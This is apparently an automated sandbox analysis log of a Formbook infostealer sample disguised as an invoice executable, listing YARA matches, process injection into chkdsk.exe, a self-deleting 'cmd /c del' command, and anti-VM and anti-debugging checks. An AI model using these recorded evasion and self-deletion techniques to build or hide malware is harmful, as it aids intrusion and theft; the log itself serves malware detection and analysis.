Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CC8C6F	17_2_04CC8C6F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CC8C70	17_2_04CC8C70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CC2D87	17_2_04CC2D87
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CC2D90	17_2_04CC2D90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CC2FB0	17_2_04CC2FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CDB84B	17_2_04CDB84B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CDCA15	17_2_04CDCA15

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Code function: String function: 00BEB150 appears 34 times

Source: INVOICE_90990_PDF.exe, 00000000.00000003.230287004.0000000002366000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INVOICE_90990_PDF.exe
Source: INVOICE_90990_PDF.exe, 00000002.00000002.313510605.000000000079C000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs INVOICE_90990_PDF.exe
Source: INVOICE_90990_PDF.exe, 00000002.00000002.314480736.0000000000E6F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INVOICE_90990_PDF.exe

Source: INVOICE_90990_PDF.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/0@9/6

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Code function: 0_2_00401120 CoCreateInstance,

0_2_00401120

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5380:120:WilError_01

Source: INVOICE_90990_PDF.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: INVOICE_90990_PDF.exe	Virustotal: Detection: 34%
Source: INVOICE_90990_PDF.exe	ReversingLabs: Detection: 32%

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

File read: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\INVOICE_90990_PDF.exe 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Process created: C:\Users\user\Desktop\INVOICE_90990_PDF.exe 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Process created: C:\Users\user\Desktop\INVOICE_90990_PDF.exe 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'	Jump to behavior

Source: INVOICE_90990_PDF.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: chkdsk.pdbGCTL source: INVOICE_90990_PDF.exe, 00000002.00000002.313490785.0000000000789000.00000004.00000020.sdmp
Source:	Binary string: C:\xampp\htdocs\Loct\3ec9815872b24c7398dfa8b3102e9d98\Loader\Project1\Release\Project1.pdb source: INVOICE_90990_PDF.exe
Source:	Binary string: chkdsk.pdb source: INVOICE_90990_PDF.exe, 00000002.00000002.313490785.0000000000789000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: INVOICE_90990_PDF.exe, 00000000.00000003.225868321.0000000003B40000.00000004.00000001.sdmp, INVOICE_90990_PDF.exe, 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, chkdsk.exe, 00000011.00000002.493007627.0000000004F0F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: INVOICE_90990_PDF.exe, chkdsk.exe, 00000011.00000002.493007627.0000000004F0F000.00000040.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Unpacked PE file: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R; vs .text:ER;

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_00403116 push ecx; ret	0_2_00403129
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041BA45 push esi; ret	2_2_0041BAA2
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041B3C5 push eax; ret	2_2_0041B418
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041B47C push eax; ret	2_2_0041B482
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041B412 push eax; ret	2_2_0041B418
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041B41B push eax; ret	2_2_0041B482
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041C4FB push cs; iretd	2_2_0041C503
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041C52C push dword ptr [2E33947Ah]; ret	2_2_0041C7DC
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00415D3C push ebx; ret	2_2_00415D3D
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041C580 push dword ptr [2E33947Ah]; ret	2_2_0041C7DC
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041C7DD push dword ptr [2E33947Ah]; ret	2_2_0041C7DC
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C3D0D1 push ecx; ret	2_2_00C3D0E4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CDC4FB push cs; iretd	17_2_04CDC503
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CDB47C push eax; ret	17_2_04CDB482
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CDB41B push eax; ret	17_2_04CDB482
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CDB412 push eax; ret	17_2_04CDB418
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CDC580 push dword ptr [2E33947Ah]; ret	17_2_04CDC7DC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CDC52C push dword ptr [2E33947Ah]; ret	17_2_04CDC7DC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CD5D3C push ebx; ret	17_2_04CD5D3D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CDC7DD push dword ptr [2E33947Ah]; ret	17_2_04CDC7DC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CDBA45 push esi; ret	17_2_04CDBAA2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CDB3C5 push eax; ret	17_2_04CDB418

Source: C:\Windows\SysWOW64\chkdsk.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000004CC85F4 second address: 0000000004CC85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000004CC898E second address: 0000000004CC8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Code function: 2_2_004088C0 rdtsc

2_2_004088C0

Source: C:\Windows\SysWOW64\chkdsk.exe TID: 4776

Thread sleep time: -38000s >= -30000s

Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Code function: 0_2_004074A7 FindFirstFileExW,

0_2_004074A7

Source: explorer.exe, 00000005.00000000.252276617.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000000.252879010.0000000008BB0000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.251741765.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.240320968.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.268424714.000000000374F000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.253074666.0000000008C68000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}((
Source: explorer.exe, 00000005.00000000.265841146.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000005.00000000.252354388.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000005.00000000.246351098.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000005.00000000.251741765.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.251741765.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.252354388.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: INVOICE_90990_PDF.exe	Binary or memory string: `vmcI
Source: explorer.exe, 00000005.00000000.251741765.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Code function: 2_2_004088C0 rdtsc

2_2_004088C0

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Code function: 2_2_00409B30 LdrLoadDll,

2_2_00409B30

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Code function: 0_2_00402E84 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00402E84

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_004081DD mov eax, dword ptr fs:[00000030h]	0_2_004081DD
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_00405F4E mov eax, dword ptr fs:[00000030h]	0_2_00405F4E
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_021F06DA mov eax, dword ptr fs:[00000030h]	0_2_021F06DA
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_021F0A1C mov eax, dword ptr fs:[00000030h]	0_2_021F0A1C
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_021F08EE mov eax, dword ptr fs:[00000030h]	0_2_021F08EE
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_021F099F mov eax, dword ptr fs:[00000030h]	0_2_021F099F
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_021F09DE mov eax, dword ptr fs:[00000030h]	0_2_021F09DE
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00C7B8D0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C7B8D0 mov ecx, dword ptr fs:[00000030h]	2_2_00C7B8D0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00C7B8D0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00C7B8D0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00C7B8D0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00C7B8D0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE9080 mov eax, dword ptr fs:[00000030h]	2_2_00BE9080
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C63884 mov eax, dword ptr fs:[00000030h]	2_2_00C63884
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C63884 mov eax, dword ptr fs:[00000030h]	2_2_00C63884
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE58EC mov eax, dword ptr fs:[00000030h]	2_2_00BE58EC
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]	2_2_00C120A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]	2_2_00C120A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]	2_2_00C120A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]	2_2_00C120A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]	2_2_00C120A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]	2_2_00C120A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C290AF mov eax, dword ptr fs:[00000030h]	2_2_00C290AF
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1F0BF mov ecx, dword ptr fs:[00000030h]	2_2_00C1F0BF
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1F0BF mov eax, dword ptr fs:[00000030h]	2_2_00C1F0BF
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1F0BF mov eax, dword ptr fs:[00000030h]	2_2_00C1F0BF
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C00050 mov eax, dword ptr fs:[00000030h]	2_2_00C00050
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C00050 mov eax, dword ptr fs:[00000030h]	2_2_00C00050
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]	2_2_00BFB02A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]	2_2_00BFB02A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]	2_2_00BFB02A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]	2_2_00BFB02A
